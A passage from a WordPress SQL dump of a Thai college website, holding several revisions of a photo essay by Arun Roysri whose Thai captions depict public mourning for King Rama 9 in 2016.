ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:20:44', '2018-11-12 07:20:44', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4385, 3, '2018-11-12 14:23:19', '2018-11-12 07:23:19', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<img class=\"wp-image-4316 size-large alignright\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<p class=\"alignnone\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:23:19', '2018-11-12 07:23:19', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4386, 3, '2018-11-12 14:24:16', '2018-11-12 07:24:16', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ 